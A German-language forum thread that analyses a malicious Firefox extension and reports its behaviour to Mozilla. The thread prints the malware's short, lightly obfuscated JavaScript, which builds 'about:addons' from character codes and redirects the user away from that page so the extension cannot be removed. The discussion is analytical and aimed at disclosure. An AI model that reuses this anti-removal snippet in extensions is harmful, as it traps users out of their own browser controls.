    var tArr = [115, 100, 98, 116, 97, 100, 111, 117, 97, 111, 58, 110];
    var tArrI = [8, 2, 6, 7, 3, 10, 4, 1, 5, 9, 11, 0];
    var xtraRedirect = "";
    for(var i=0; i<tArr.length; i++)
    	xtraRedirect += String.fromCharCode(tArr[tArrI[i]]);
    browser.tabs.onUpdated.addListener(function (tabId, changeInfo, tab) {
    	if(changeInfo.url == xtraRedirect){
    		browser.tabs.update(tabId, {url: "https://www.google.com/"});
    	}
    });


    Das ist nicht dumm gemacht. Das Ding setzt einen EventListener, der dann auslöst wenn ein Tab aktualisiert wird. Dann vergleicht es die neue URL des "upgedateten" Tabs mit der Variable "xtraRedirect" und schickt den Anwender beim erfolgreichen Vergleich nach google indem es einfach die URL erneut aktualisiert.

    Der Trick da ist jetzt, wie dieses "xtraRedirect" erstellt wird. Es wird "erzeugt". String.fromCharCode ist dazu gedacht, um Zugriff auf die Zeichen im Unicode-Standard zu bekommen. In diesem Beispiel erzeugt die Funktion "nur" den String "about:addons" und zieht ihn als Vergleich für die Tab-URL heran. Ich habe mal eine kleine HTML-Datei gebaut:


    Obiges einfach als test.html speichern und im Firefox laden. In der Konsole (F12) kann man schön sehen, wie der String "about:addons" Zeichen für Zeichen zusammen gesetzt wird.

    Nach meinem Verständnis sollte Firefox genau DAS eigentlich verhindern. Firefox darf durchaus das Event abfeuern, aber in dem Augenblick müsste er halt den Tab davor schützen, dass ein AddOn die URL verändert.

    Sören, was sagst Du?

    Greetz,
    DF

  • WebExtensions sollten niemals about:addons, about:preferences, about:config und andere about:-Seiten blockieren dürfen. Das funktioniert für alle anderen about:-Seiten ebenfalls, das habe ich getestet. Das ist ja einer der wichtigsten Punkte von WebExtensions, dass Firefox-Interna besser geschützt sind.

    Die Sache mit dem xtraRedirect dient übrigens nur der Verschleierung. Das habe ich auch getestet. Es funktioniert auch, wenn man about:addons im Klartext verwendet.

    Ich habe es bereits an Mozilla gemeldet, aber eine Bugzilla-ID bringt an dieser Stelle nicht viel, da ich das Ticket nicht öffentlich erstellt habe, weil ich die fragliche Erweiterung dort ebenfalls angehängt habe.

  • Übles Ding. Ja, ich schätze, da muss Mozilla mal ran. Das kann man schon fast fahrlässig nennen, denn noch viel einfacher kann man es den Brüdern nicht mehr machen... :P

    Windows 10 | FF 62.0 (64-Bit) / FF 61.0 (64-Bit) / FF 63.0 (64-Bit)


  • WebExtensions sollten niemals about:addons, about:preferences, about:config und andere about:-Seiten blockieren dürfen.

    So wie die Malware das macht dürfte das ja für alle Seiten klappen. Man könnte sich also z.B. eine PseudoURL für das eigene AddOn überlegen und die dann automatisch auf die Optionenseite oder sonst wo hinlenken... Das ermöglicht es z.B. in einem Hilfetext auf einer externen Seite einfach zu sagen "gib about:[addonname]" in die Adresszeile ein um die Optionen zu sehen. Oder gleich komplett a la

    [addonname]:[gewünschteoptionsseite].

    Sendet der Fuchs das Event auch bei Pseudo-URLs die er selbst gar nicht kennt? Und wenn er das macht, wie verhindert man, dass sich ein anderes AddOn dieses Event unter den Nagel reisst... schwierige Fragen :). Gute N8.

    Greetz,
    DF


  • Übles Ding. Ja, ich schätze, da muss Mozilla mal ran. Das kann man schon fast fahrlässig nennen, denn noch viel einfacher kann man es den Brüdern nicht mehr machen... :P

    Noch schnell: Das Grundproblem sehe ich da eher in der automatischen Signierung aller AddOns. Das die irgendwann später mal vielleicht gesperrt werden ist dann für viele Fälle schon zu spät.

    Greetz,
    DF

  • Das Schema "about:[addonname]" existiert für WebExtensions nicht. Die URL hat immer so ein Schema:

    moz-extension://dc8244f0-f196-644f-bd16-bfc166a8693d/html/options.html

    Wobei der Part "dc8244f0-f196-644f-bd16-bfc166a8693d" zufällig ist. Bei zwei Nutzern, welche die exakt gleiche Erweiterungen installieren, steht dort jeweils etwas anderes.


  • Das Schema "about:[addonname]" existiert für WebExtensions nicht. Die URL hat immer so ein Schema:

    Du hast mich nicht verstanden. Die Malware testet die URL und schreibt bei Bedarf was anderes hin. Das kann man aber auch selbst machen, da ist im Grunde nichts verwerfliches dran.
    URL checken, bei "[addonname]:optionsseite" eingreifen und auf die gewünschte Seite umlenken. Die korrekte URL liefert browser.extension.getURL.

    Die einzige Bedingung ist halt, dass der Fuchs auch bei ihm unbekannten Adressen das Event feuert... ich muss das nach der Arbeit mal durchtesten.

    Greetz,
    DF


  • na, da hab ich wohl nen heftigen Sicherheitsbug entdeckt... ich werde mich auch künftig weiter auf die Suche begeben :D

    Viel schlimmer finde ich eigentlich, dass man Firefox per JavaScript faktisch blockieren kann und dem Nutzer nichts anderes übrig bleibt als die Malware zu installieren. SafeMode und Scriptblocker mal aussen vor. Wer kennt schon als normaler Nutzer die Tastenkürzel zum Tab schliessen etc.

    Greetz,
    DF